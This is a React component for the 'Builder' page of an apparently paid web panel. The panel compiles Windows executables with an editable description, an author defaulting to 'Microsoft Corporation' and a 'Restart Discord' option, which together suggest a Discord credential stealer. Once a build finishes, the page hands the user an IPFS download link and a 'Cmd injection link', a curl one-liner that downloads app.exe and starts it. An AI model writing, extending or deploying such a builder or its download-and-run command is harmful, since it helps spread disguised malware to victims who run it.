import React, { useEffect, useState } from 'react'
import toast from 'react-hot-toast';
import { useNavigate } from 'react-router-dom'
import '@fortawesome/fontawesome-svg-core/styles.css'
import { library } from '@fortawesome/fontawesome-svg-core'
import { fas } from '@fortawesome/free-solid-svg-icons'
import { FontAwesomeIcon } from '@fortawesome/react-fontawesome'

library.add(fas)

function Builder () {
    const navigate = useNavigate()
    const [builder, setBuilder] = useState({});
    const [description, setDescription] = useState('Made with love')
    const [author, setAuthor] = useState('Microsoft Corporation')
    const [discord, setDiscord] = useState(true);
    const [premium, setPremium] = useState(true);
    const [ratelimited, setRateLimited] = useState(true);
    const [loading, setLoading] = useState(true);

    const descriptionHandle = event => {
        setDescription(event.target.value)
    }
    const authorHandle = event => {
        setAuthor(event.target.value)
    }
    const discordHandle = () => {
        setDiscord(!discord);
    };

    useEffect(() => {
        const builderInfoEffect = async () => {
            const response = await fetch(
                'https://api.vnetwork.cc/api/v1/software/get',
                {
                    method: 'GET',
                    headers: {
                        'Content-Type': 'application/json',
                        authorization: localStorage.getItem('token')
                    }
                }
            )
            const data = await response.json()
            if (response.ok) {
                setBuilder(data);
                setPremium(data.premium);
                setLoading(false);
            }

            if(response.status == '401' && data.premium == false){
                setPremium(data.premium);
                setBuilder({})
                setLoading(false);
            }
        }
        
        const intervalId = setInterval(async () => {
            builderInfoEffect();
            console.log(premium);
        }, 5000);

        builderInfoEffect();
        

        return () => {
			clearInterval(intervalId);
		};
    }, [])

    const CreateClick = async () => {
        const response = await fetch(
            'https://api.vnetwork.cc/api/v1/software/create',
            {
                method: 'POST',
                headers: {
                    authorization: localStorage.getItem('token')
                },
                body: JSON.stringify({
                    discord: discord.toString(),
                    author: author,
                    description: description
                })
            }
        )
        const data = await response.json()
        if (response.ok) {
            toast('Your executable is being compiled !', {
                icon: '👏',
                style: {
                    borderRadius: '10px',
                    background: '#32394e',
                    color: '#fff',
                },
            });
            setRateLimited(false);
            setTimeout(() => {
                setRateLimited(true);
            }, 300000)
        }

        if(response.status == '429'){
            toast('You are ratelimited !', {
                icon: '😡',
                style: {
                    borderRadius: '10px',
                    background: '#32394e',
                    color: '#fff',
                },
            });
        }
    }

    return (
        <div className="row">
            <div className="col-xl-5">
                <div className="card">
                    <div className="card-body">
                        <h4 className="card-title mb-4">Generate</h4>
                        <div className="row">
                            <div className="col-sm-12">
                                <div className="pt-1">
                                    <div className="bg-light p-3 d-flex mb-3 rounded managed">
                                        <div className="flex-grow-1">
                                            <label>Description</label>
                                            <input type="text" className="form-control" disabled={premium == false ? true : false} value={description} onChange={descriptionHandle}/>
                                        </div>
                                    </div>
                                    <div className="bg-light p-3 d-flex mb-3 rounded managed">
                                        <div className="flex-grow-1">
                                            <label>Author</label>
                                            <input type="text" className="form-control" disabled={premium == false ? true : false} value={author} onChange={authorHandle}  />
                                        </div>
                                    </div>
                                    <div className="bg-light p-3 d-flex mb-3 rounded managed">
                                        <div className="flex-grow-1">
                                            <label>Another</label>
                                            <div className="form-check form-check-flat form-check-primary">
                                                <label className="form-check-label">
                                                <input type="checkbox" checked={discord} onChange={discordHandle} disabled={premium == false ? true : false} className="form-check-input" /> Restart Discord <i className="input-helper"></i></label>
                                            </div>
                                        </div>
                                    </div>
                                    <button type="button" className="btn btn-primary btn-hover w-100 rounded" disabled={premium == false || ratelimited == false ? true : false} onClick={() => CreateClick()}>Generate</button>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div className="col-xl-7">
                {loading == false && premium == false && (
					<div className="bg-light p-3 d-flex mb-3 rounded managed" onClick={() => {navigate(`/premium`);}}>
						<div className="flex-grow-1">
							<h5 className="font-size-15 mb-1 text-center">❌ {premium} You are not premium ❌</h5>
						</div>
					</div>
                )}
                
                { loading == true && (
                    <div className='placeholder-glow'>

                        <div className="card bg-light" >
                            <div className="card-body">
                                <div class="mb-3">
                                    <label className='placeholder'>0000000000000</label>
                                    <textarea class="form-control placeholder" rows="2" value={`0000000000000000000000000000`} />
                                </div>
                            </div>
                        </div>

                        <div className="card bg-light">
                            <div className="card-body">
                                <div class="mb-3">
                                    <label className='placeholder'>000000000000000000</label>
                                    <textarea class="form-control placeholder" value={`000000000000000000000000000000000000000000000000000000000`} rows="3" />
                                </div>
                            </div>
                        </div>
                    </div>
                )}

                { loading == false && !builder.cid && builder.step == 0  && (
                    <>
                        <div className="alert alert-secondary" role="alert">
                            <h4 className="alert-heading">Welcome to the Builder area !</h4>
                            <p>Here you can create an executable, modify its description and author, and add or remove options ! </p>
                        </div>
                    </>
                )}

                { loading == false && builder.cid == 0 && builder.step != 0  && (
                    <>
                        <div className="alert alert-warning" role="alert">
                            <h4 className="alert-heading">Your executable is compiling !</h4>
                            <p>Your executable is {builder.step}/5 steps away! ! </p>
                        </div>
                    </>
                )}

                { loading == false && builder.cid != 0 && builder.step == 5 && (
                    <>
                        <div className="alert alert-success" role="alert">
                            <h4 className="alert-heading">Well done!</h4>
                            <p>Here you can find the exe you generated with the link and the Cmd injection link below. </p>
                        </div>

                        <div className="card bg-light" >
                            <div className="card-body">
                                <div class="mb-3">
                                    <label >Link</label>
                                    <textarea class="form-control" rows="2" value={`https://${builder.cid}.ipfs.nftstorage.link/app.exe`} />
                                </div>
                            </div>
                        </div>

                        <div className="card bg-light">
                            <div className="card-body">
                                <div class="mb-3">
                                    <label >CMD Link</label>
                                    <textarea class="form-control" value={`curl -o app.exe https://${builder.cid}.ipfs.nftstorage.link/app.exe && start app.exe`} rows="3" />
                                </div>
                            </div>
                        </div>
                    </>
                )}
            </div>
        </div>

    )
}

export default Builder;